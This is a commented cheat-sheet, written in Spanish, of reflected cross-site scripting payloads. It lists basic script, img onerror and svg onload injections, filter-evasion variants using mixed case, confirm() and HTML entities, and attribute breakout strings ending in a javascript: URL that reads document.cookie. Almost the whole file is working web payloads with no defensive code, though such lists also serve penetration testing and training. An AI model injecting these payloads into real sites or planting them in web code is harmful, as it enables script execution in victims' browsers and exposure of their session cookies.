# =========================================================
# PAYLOADS XSS REFLEJADOS (Reflected XSS Payloads)
# =========================================================
# Estos payloads dependen de que el input del usuario (típicamente de la URL) 
# se muestre inmediatamente en la respuesta HTML sin sanitización.

# 1. TESTEO BÁSICO DE FUNCIONALIDAD (Etiquetas comunes)
# ----------------------------------------------------

# 1.1 Script básico
# Detecta si se permite la etiqueta <script> y el handler alert()
<script>alert('XSS')</script>

# 1.2 Etiqueta de imagen con error (sin usar <script>)
# Útil si <script> está en una lista negra. 
# El browser intenta cargar una imagen 'x' y ejecuta el evento onerror.
<img src=x onerror=alert(document.domain)>

# 1.3 Etiqueta SVG con evento onload
# Alternativa a <img>. Requiere que la entrada se refleje como un elemento HTML.
<svg onload=alert(1)>

# 1.4 Etiqueta de cuerpo con evento onload
# Útil si el input puede controlar la etiqueta <body> (más raro).
<body onload=alert(1)>

# 2. BYPASS DE FILTROS COMUNES (Lista negra de palabras)
# ----------------------------------------------------

# 2.1 Uso de mayúsculas/minúsculas para bypass de listas negras simples
# Si el filtro no es 'case-insensitive'.
<ImG sRc=x OnErRoR=aLeRt(1)>

# 2.2 Reemplazo de palabras clave (alert() -> confirm(), prompt())
# Si 'alert' está prohibido.
<script>confirm(document.domain)</script>

# 2.3 Uso de entidades HTML (Unicode/Decimal)
# Si el filtro bloquea el string 'script' directamente.
# Ejemplo: <script> -> &#x3c;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;
&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;

# 3. CONTEXTO DE INYECCIÓN (Si el input está dentro de un atributo)
# ----------------------------------------------------------------

# 3.1 Rompiendo atributos con comillas dobles
# Contexto: <input type="text" value="[INPUT]">
# Payload: "> <img src=x onerror=alert(1)>
"> <img src=x onerror=alert(1)>

# 3.2 Rompiendo atributos con comillas simples
# Contexto: <a href='[INPUT]'>link</a>
# Payload: ' onclick=alert(1) a='
' onclick=alert(1) a='

# 3.3 Usando Javascript en el atributo href
# Contexto: <a href="[INPUT]">link</a>
# Payload: javascript:alert(document.cookie)
javascript:alert(document.cookie)